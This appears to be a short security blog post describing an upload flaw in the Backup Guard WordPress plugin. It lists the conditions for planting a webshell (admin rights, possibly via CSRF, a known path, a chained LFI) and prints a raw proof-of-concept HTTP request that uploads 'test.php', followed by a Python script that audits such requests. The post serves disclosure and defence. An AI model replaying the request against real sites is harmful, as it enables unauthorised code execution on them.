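This vulnerability alone is not enough to get a webshell running; the target site has to meet a few preconditions.

1. The path of the file uploaded through Backup Guard must be discoverable. (Directory listing being enabled would be ideal.)

2. Administrator privileges are required. This could probably be done through CSRF or similar?

3. The file is not stored with a .php extension, so even with the path known it is only served as a text file. An additional vulnerability such as LFI therefore has to be chained.
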
POST http://192.168.0.91/wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.0.91
Connection: keep-alive
Content-Length: 1946784
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.0.91
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqE6amufQR0PqHraP
Referer: http://192.168.0.91/wp-admin/admin.php?page=backup_guard_backups
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: wordpress_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C19f158651e5c5c1fe87fe3a2ab632c9506ceb98f23e1d6fd747b05e8668fe492; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C1f1c5e2111be175767c1f2f14ac571a1fe9a5453240b9e331093ef6ce229f0d9; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1455757129

------WebKitFormBoundaryqE6amufQR0PqHraP
Content-Disposition: form-data; name="sgbpFile"; filename="test.php"
Content-Type: application/octet-stream


------WebKitFormBoundaryqE6amufQR0PqHraP
Content-Disposition: form-data; name="action"

backup_guard_importBackup
------WebKitFormBoundaryqE6amufQR0PqHraP--
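
A defensive check built around the request above, as an added example that is not from the original post or the plugin: it parses a captured multipart body and flags Backup Guard imports that carry no WordPress nonce field or whose upload is not a backup archive. The `.sgbp` extension, the function names and the sample request bodies are assumptions constructed for illustration.

```python
# Added example: audit a captured admin-ajax.php upload (not Backup Guard's own code).
import os
from email import message_from_bytes

IMPORT_ACTION = "backup_guard_importBackup"  # action value in the request on this page
UPLOAD_FIELD = "sgbpFile"                    # file field in the request on this page
ALLOWED_EXT = {".sgbp"}                      # assumption: extension of a genuine backup
NONCE_FIELDS = ("_ajax_nonce", "_wpnonce")   # fields WordPress's check_ajax_referer() reads


def parse_form(content_type, body):
    """Split a multipart/form-data body into ({field: value}, {field: filename})."""
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    fields, files = {}, {}
    for part in (msg.get_payload() if msg.is_multipart() else []):
        name = part.get_param("name", header="content-disposition")
        if part.get_filename() is not None:
            files[name] = part.get_filename()
        else:
            fields[name] = part.get_payload(decode=True).decode(errors="replace").strip()
    return fields, files


def audit_import(content_type, body):
    """Return findings for one request; an empty list means nothing to flag."""
    fields, files = parse_form(content_type, body)
    if fields.get("action") != IMPORT_ACTION:
        return []                            # not a Backup Guard import
    findings = []
    if not any(f in fields for f in NONCE_FIELDS):
        findings.append("no nonce field")    # nothing in the body ties it to an admin's page
    name = files.get(UPLOAD_FIELD, "")
    ext = os.path.splitext(name.replace("\\", "/").rsplit("/", 1)[-1])[1].lower()
    if ext not in ALLOWED_EXT:
        findings.append(f"unexpected upload extension {ext!r}")
    return findings


def sample(filename, extra=""):
    """Constructed request body shaped like the one on this page."""
    b = "----ConstructedBoundary"
    return (f"multipart/form-data; boundary={b}",
            (f"--{b}\r\nContent-Disposition: form-data; name=\"{UPLOAD_FIELD}\"; "
             f"filename=\"{filename}\"\r\nContent-Type: application/octet-stream\r\n\r\nDATA\r\n"
             f"{extra}--{b}\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n"
             f"{IMPORT_ACTION}\r\n--{b}--\r\n").encode())


if __name__ == "__main__":
    print(audit_import(*sample("test.php")))
```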


Reference: http://www.pritect.net/blog/backup-guard-1-0-3-security-vulnerability


Posted by Maid:: IzayoiSakuya